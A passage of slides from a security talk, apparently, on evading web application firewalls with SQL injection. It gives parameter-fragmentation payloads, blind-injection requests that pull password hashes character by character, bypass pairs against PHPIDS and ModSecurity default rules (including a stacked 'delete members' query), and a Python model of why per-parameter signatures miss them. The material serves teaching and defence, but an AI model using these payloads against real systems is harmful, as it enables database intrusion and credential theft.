select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
Lavakumar Kuppan, http://lavakumar.com/Split_and_Join.pdf
Practice of Bypassing WAF: SQL Injection HPF
Using HTTP Parameter Fragmentation (HPF)
Vulnerable code examples
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
The following request does not let anyone conduct an attack
/?a=1+union+select+1,2/*
These requests may be performed successfully using HPF
/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
The SQL requests become
select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
http://www.webappsec.org/lists/websecurity/archive/2009-08/msg00080.html
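The two WAF signatures from the "What is WAF" slide run against the HPP (example 2) and HPF requests above, as one added example that is not from the presentation or the cited papers. The per-parameter inspection model, the ASP comma-join and the PHP last-value behaviour are assumptions of the example rather than statements on the slides.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The two signatures quoted on the "What is WAF" slide, with the same i and s flags.
SIGNATURES = [
    re.compile(r"(sel)(ect.+fr)(om)", re.I | re.S),
    re.compile(r"(uni)(on.+sel)(ect)", re.I | re.S),
]

def matches_signature(text: str) -> bool:
    return any(sig.search(text) for sig in SIGNATURES)

def params(url: str):
    """Query string as (name, value) pairs: duplicates kept, %xx and '+' decoded."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)

def waf_blocks(url: str) -> bool:
    """A WAF that inspects every parameter value on its own (the usual ARGS model)."""
    return any(matches_signature(value) for _, value in params(url))

# Back-end behaviour assumed for the two examples (an assumption of this
# example, not a statement from the slides): ASP's Request.QueryString("id")
# joins repeated names with ','; PHP's $_GET keeps the last value of a name.
def asp_value(url: str, name: str) -> str:
    return ",".join(v for n, v in params(url) if n == name)

def php_value(url: str, name: str) -> str:
    return dict(params(url)).get(name, "")

def hpp_query(url: str) -> str:
    """The concatenation from HPP example 2."""
    return "select key from table where id=" + asp_value(url, "id")

def hpf_query(url: str) -> str:
    """The concatenation from the first vulnerable HPF code example."""
    return ("select * from table where a=" + php_value(url, "a")
            + " and b=" + php_value(url, "b"))

def strip_comments(sql: str) -> str:
    """The statement after the DBMS parser drops /* ... */ comments."""
    return re.sub(r"\s*/\*.*?\*/\s*", " ", sql, flags=re.S).strip()

def assess(url: str, builder):
    """(blocked by the per-parameter WAF?, SQL the back end builds,
    what the DBMS effectively parses)"""
    sql = builder(url)
    return waf_blocks(url), sql, strip_comments(sql)

if __name__ == "__main__":
    print(assess("/?id=1+union+select+pwd+from+users", hpp_query))
    print(assess("/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users", hpp_query))
    print(assess("/?a=1+union/*&b=*/select+1,2", hpf_query))
```

Each fragment on its own matches neither signature; the keywords only line up once the back end has joined the parameters and the DBMS has thrown away the comments, and neither of those steps is visible to a WAF that scores parameter values one at a time.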
Practice of Bypassing WAF: Blind SQL Injection
Using logical requests AND/OR
The following requests allow one to conduct a successful attack against many WAFs
/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Negation and inequality signs (!=, <>, <, >) can be used instead of the equality sign. It is amazing, but many WAFs miss it!
It becomes possible to exploit the vulnerability with the blind SQL Injection method by replacing the SQL functions that match WAF signatures with their synonyms
substring() -> mid(), substr(), etc.
ascii() -> hex(), bin(), etc.
benchmark() -> sleep()
The given example is valid for all WAFs whose developers aim to cover as many web applications as possible
Practice of Bypassing WAF: Blind SQL Injection
Known:
substring((select 'password'),1,1) = 0x70
substr((select 'password'),1,1) = 0x70
mid((select 'password'),1,1) = 0x70
New:
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first argument is smaller than the second one, and 1 otherwise
http://dev.mysql.com/doc/refman/5.0/en/string-comparison-functions.html
Practice of Bypassing WAF: Blind SQL Injection
Blind SQL Injection does not always imply the use of AND/OR! Here the strc​mp() result (-1, 0 or 1) is added to a known id, so only the matching character yields the existing record.
Vulnerable code examples
Query("select * from table where uid=".$_GET['uid']);
Query("select * from table where card=".$_GET['card']);
Exploitation examples
false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)%2B112233
false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x61)%2B112233
true: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x62)%2B112233
first hash character = B
false: ...
false: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6240)%2B112233
true: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6241)%2B112233
second hash character = A
Practice of Bypassing WAF: SQL Injection SignatureBypass
PHPIDS (0.6.1.1) default rules
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Practice of Bypassing WAF: SQL Injection SignatureBypass
Mod_Security (2.5.9) default rules
Forbid:/?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows:/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
Conclusions
SQL Injection in wildlife
SQL Injection can be found even in widely known andlarge Internet resources
Conclusions
SQL Injection is a gross programming error, which is widespread and very dangerous
WAF is not the long-awaited silver bullet
WAF does not eliminate a vulnerability, it only partly screens the attack vector
The conceptual problems of WAFs stem from the signature principle
A correctly organized Software Development Life Cycle (SDLC) considerably reduces the probability that a vulnerability will appear in program code
Web application protection (and information security as a whole) must be comprehensive :)
Automated Exploitation of SQL Injection
sqlmap (http://sqlmap.sourceforge.net/): full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server; partial support for Microsoft Access, DB2, Informix, Sybase, Interbase
sqlsus (http://sqlsus.sourceforge.net/): only MySQL support is implemented
bsqlbf-v2 (http://code.google.com/p/bsqlbf-v2/): no longer limited to Blind SQL Injection; supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server
In view of the new fast techniques of Blind SQL Injection exploitation in MySQL, a corresponding proof of concept is going to be released (it will be available on http://www.milw0rm.com/papers/)
Automatic detection of SQL Injection
Thank you for your attention!
[email protected]
http://devteev.blogspot.com/